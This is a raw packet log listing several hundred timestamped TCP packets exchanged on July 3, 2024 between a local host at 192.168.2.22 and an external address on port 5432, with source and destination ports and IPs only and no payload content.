Jul 3, 2024 02:22:31.864026070 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.864037991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864047050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864057064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864067078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864077091 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864078045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.864084959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864092112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.864094973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864105940 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.864119053 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.864125967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.864192009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.864228010 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.871225119 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871273041 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.871352911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871361971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871371984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871381998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871392012 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871401072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871402025 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.871411085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.871411085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.871426105 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.871439934 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.882833958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.882879972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.882882118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.882889986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.882914066 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.882975101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.882986069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.882996082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883012056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883021116 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883023977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883028030 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883033991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883042097 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883044004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883054972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883069038 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883070946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883080959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883090019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883100033 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883107901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883110046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883119106 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883121967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883132935 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883133888 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883147001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883162975 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883330107 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883341074 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883351088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883363962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883373976 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883383036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883393049 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883397102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883405924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883414984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883433104 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883435011 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883443117 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883443117 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883454084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883465052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.883467913 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883481979 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883492947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.883630991 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.897763014 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.897802114 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.897839069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.897864103 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.897874117 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.897900105 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.897908926 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.897911072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.897917986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.897927046 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.897938013 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.897948980 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.915962934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.915973902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916057110 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916081905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916090965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916105986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916111946 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916115999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916126966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916129112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916136026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916146994 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916147947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916161060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916227102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916243076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916255951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916264057 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916269064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916270971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916285992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916286945 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916296005 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916297913 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916306019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916316032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916322947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916332960 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916337967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916342974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916352987 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916353941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916363001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916363955 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916373968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916378021 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916390896 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916399002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916414976 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916543007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916580915 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916585922 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916594028 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916604042 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916615009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916627884 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916627884 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916640043 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916663885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916671038 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916680098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916688919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.916706085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916716099 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.916925907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932163000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932210922 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932349920 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932358980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932372093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932383060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932390928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932399035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932400942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932409048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932411909 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932421923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932423115 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932430983 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932435036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932440996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932449102 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932451963 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932461023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932473898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932491064 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932502985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932514906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932549000 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.932697058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.932738066 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945485115 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945533991 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945550919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945568085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945578098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945595026 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945604086 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945621014 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945631027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945641041 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945650101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945667982 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945677996 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945694923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945705891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945714951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945724964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945730925 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945741892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945745945 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945750952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945760965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945760965 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945769072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.945771933 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945785999 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945799112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.945945024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955246925 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955261946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955271959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955281973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955291986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955300093 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955301046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955308914 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955311060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955321074 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955322981 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955332041 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955337048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955342054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955348969 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955353022 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955360889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955362082 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955372095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955374002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955382109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.955387115 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955400944 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955409050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.955430984 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.962059975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962078094 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962090015 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962100029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962115049 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962120056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.962124109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962131977 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.962137938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962146997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.962148905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.962155104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.962177992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974023104 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974040031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974055052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974070072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974080086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974081993 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974081993 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974090099 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974104881 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974114895 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974119902 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974124908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974136114 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974138021 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974147081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974153996 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974167109 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974174023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974205971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974216938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974231958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974241972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974251032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974263906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974267960 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974276066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974277973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974287987 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974292994 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974297047 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974307060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974313021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974322081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974329948 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974332094 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974340916 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974342108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974353075 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974353075 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974361897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974373102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974374056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974381924 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974386930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974391937 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974396944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.974407911 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974420071 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.974598885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.988506079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.988524914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.988533974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.988559961 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.988570929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.988590002 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.988599062 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.988610029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.988619089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.988639116 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.988647938 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007519007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007565975 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007627964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007638931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007648945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007664919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007674932 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007683039 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007688999 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007694960 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007698059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007705927 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007713079 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007723093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007728100 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007735014 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007735014 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007745981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007757902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007760048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007767916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007776022 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007780075 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007790089 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007791042 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007800102 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007803917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007817984 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007843971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007858038 CEST	49169	5432	192.168.2.22	116.202.180.70
